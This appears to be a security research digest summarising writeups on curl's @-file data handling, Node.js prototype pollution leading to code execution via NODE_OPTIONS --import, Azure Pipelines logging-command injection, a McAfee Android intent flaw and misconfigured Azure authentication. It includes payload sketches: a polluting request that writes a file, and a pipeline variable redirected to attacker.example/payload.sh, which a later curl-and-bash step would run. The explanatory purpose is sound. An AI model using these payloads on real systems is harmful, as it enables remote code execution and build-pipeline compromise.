When using curl, if the --data-raw argument starts with a @, it will be treated as a filename and the contents of that file will be sent as the data of the request. This sort of bug would be hard to exploit in the context of Burp and Chrome, as it requires a victim to “Copy as cURL” a malicious request in the first place and then run it. But it’s also a chance to call out that feature of curl; it might come in handy in some other exploit.
The vulnerability writeup introduces a new exploitation technique for Server-Side Prototype Pollution (SSPP) using the --import command line flag in Node.js version 19.0.0 and above. This technique allows the execution of arbitrary JavaScript code without the need for any files on the filesystem. The attack works by specifying a data URL containing the JavaScript code as the argument to --import. The Node.js developers considered this behavior “not an entrypoint security issue,” as it does not violate their threat model.
An example demonstrates how this technique can be used to gain access to the filesystem and system-based commands by importing Node.js modules. Using the –import flag with a data URL, the Node.js filesystem module is loaded, and a file is written to /tmp/pwnd with “pwnd” as its content. This technique can be tested in the “Remote code execution via server-side prototype pollution” lab.
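As a rough sketch of what that looks like (not necessarily the writeup’s exact payload), the data: URL is just URL-encoded ESM JavaScript:

// A minimal sketch, assuming Node.js 19+ where --import accepts a module URL:
//   node --import 'data:text/javascript,import{writeFileSync}from%22node:fs%22;writeFileSync(%22/tmp/pwnd%22,%22pwnd%22);'
// which is equivalent to node evaluating the following module:
import { writeFileSync } from "node:fs";
writeFileSync("/tmp/pwnd", "pwnd");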
Attack Strategy:
Use Server-Side Prototype Pollution to inject the NODE_OPTIONS property into the target object's prototype.
Set the NODE_OPTIONS value to use the --import flag with a data URL containing the arbitrary JavaScript code to be executed.
Trigger a sink function, such as fork(), which will use the injected NODE_OPTIONS and execute the arbitrary code (a sketch of such a request follows below).
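Putting the three steps together against a hypothetical vulnerable endpoint (the URL and request shape below are made up for illustration; the lab’s actual request will differ), the polluting request might look roughly like:

// Rough sketch only: the endpoint and request shape are assumptions, not taken
// from the writeup. The key idea is smuggling NODE_OPTIONS onto
// Object.prototype via a "__proto__" key, so that a later child_process.fork()
// inside the app starts node with the attacker's --import flag.
// (%22 is a URL-encoded double quote inside the data: URL.)
const body = `{
  "__proto__": {
    "NODE_OPTIONS": "--import data:text/javascript,import{writeFileSync}from%22node:fs%22;writeFileSync(%22/tmp/pwnd%22,%22pwnd%22);"
  }
}`;

await fetch("https://target.example/api/update-settings", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body,
});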
A look at how logging attacker-controlled data can be problematic in Azure Pipelines, potentially leading to code execution and access to sensitive environment variables.
The authors explore the use of “logging commands,” special strings that, when written to the build log, communicate with the agent running the pipeline. They can be used to, for example, mark a step as failed, but can do other things as well. The logging commands look something like the following:
##vso[area.action property=value;property2=value2;...]message
There are a variety of actions that might be useful to an attacker; the two they explore are task.setvariable and artifact.upload. The first is used in their dummy example: a pipeline that downloads a file from a location taken from a pipeline variable and executes it, so overriding that variable is a clear path to RCE (a rough sketch of that scenario follows below). The second is used in a case study against the scikit-learn repository.
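As a rough sketch of that first task.setvariable scenario (the variable name, the attacker URL, and the Node-based build step are all illustrative assumptions):

// Imagine a pipeline step that echoes untrusted input (an issue title, a
// commit message, a branch name, ...) into the build log:
const untrustedInput =
  "##vso[task.setvariable variable=downloadUrl]https://attacker.example/payload.sh";
console.log(untrustedInput); // the agent parses this and overwrites downloadUrl

// A later step along the lines of
//   curl "$(downloadUrl)" -o run.sh && bash run.sh
// would now download and execute the attacker's payload instead of the
// intended file.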
In the scikit-learn repository, the pipeline will log the latest commit message from a pull request, so a malicious attacker capable of getting a PR merged (you want the pipeline running inside their organization) can gain control over the scikit-learn artifacts with a commit message like:
##vso[artifact.upload]local file path
This particular scikit-learn attack feels somewhat unlikely; a commit message like that should raise questions for any human in the loop. But the general principle is worth keeping in mind: all it takes is logging attacker-controlled data to potentially do some damage.
A fairly classic mobile issue: the McAfee Security: Antivirus VPN app is highly privileged and exports a fairly generic MainActivity. The MainActivity is rather dynamic in terms of what type of content it will load, basically acting as a wrapper that loads whatever the real intent was. If the first extra is set to TRIGGER:MESSAGING, it will then look for the SCREEN extra, craft an activity intent with whatever class and extras are set in that field, and launch it.
As this is a privileged application, an attacker could abuse this to craft a SCREEN value that launches privileged intents from within the McAfee application, such as triggering a phone call. The nested intent is launched from the privileged context of the McAfee Security application.
At its core, we have a simple mistake that can be made pretty easily on all of the cloud platforms, though this post focuses on Azure App Services and Azure Functions. Being able to easily add authentication to your apps on either is nice, but it can easily be misconfigured. The added authentication only ensures the user has presented a valid token; it is left to the application to actually validate the claims within that token, to ensure the user belongs to the expected groups or has the right permissions. It is reasonably easy to add authentication but not take the extra steps to restrict it.
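As a rough sketch of what that missing step looks like, assuming an Express-style Node app behind App Service’s built-in auth (which forwards the authenticated principal in the X-MS-CLIENT-PRINCIPAL header); the group ID and the "groups" claim check below are illustrative placeholders:

import express from "express";

const app = express();

// App Service's built-in auth ("Easy Auth") has already checked that the token
// is valid by the time a request reaches the app, but it says nothing about
// whether this particular user should be allowed in. That check is on the app:
app.use((req, res, next) => {
  const header = req.header("X-MS-CLIENT-PRINCIPAL");
  if (!header) {
    res.status(401).send("unauthenticated");
    return;
  }

  // Base64-encoded JSON describing the caller and their claims.
  const principal = JSON.parse(Buffer.from(header, "base64").toString("utf8"));
  const groups: string[] = (principal.claims ?? [])
    .filter((c: { typ: string; val: string }) => c.typ === "groups")
    .map((c: { typ: string; val: string }) => c.val);

  // Placeholder group ID; in a real app this would be the group, role, or
  // permission the endpoint is actually meant to be restricted to.
  if (!groups.includes("00000000-0000-0000-0000-000000000000")) {
    res.status(403).send("forbidden");
    return;
  }
  next();
});

app.get("/admin", (_req, res) => {
  res.send("only reachable with the right claims");
});

app.listen(3000);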
The authors, noticing this, started scanning for Azure applications that require authentication but do not validate that the user has the appropriate claims. They discovered a number of vulnerable applications belonging to Microsoft, from internal tools like Contact Center (for managing call center agents) and COSMOS (a file manager with over 4 exabytes of data) to the public-facing Power Automate Blog’s WordPress admin panel.
The most impactful of these finds was the Bing Trivia app; despite its name, it seems to manage some central aspects of Bing, most importantly the Carousels section, which stores the carousels shown with some search results. For example, a search for best soundtracks has a carousel at the top containing some highly recommended movie soundtracks. The authors were able to add the 1995 movie Hackers as the top result.
They were also able to obtain XSS here (not many details, but given the level of access, probably fairly straightforward), and could use that to steal a user’s Office 365 token and access all their OneDrive files, Teams messages, Outlook emails, etc. Pretty crazy impact, but misconfigurations can do that to you.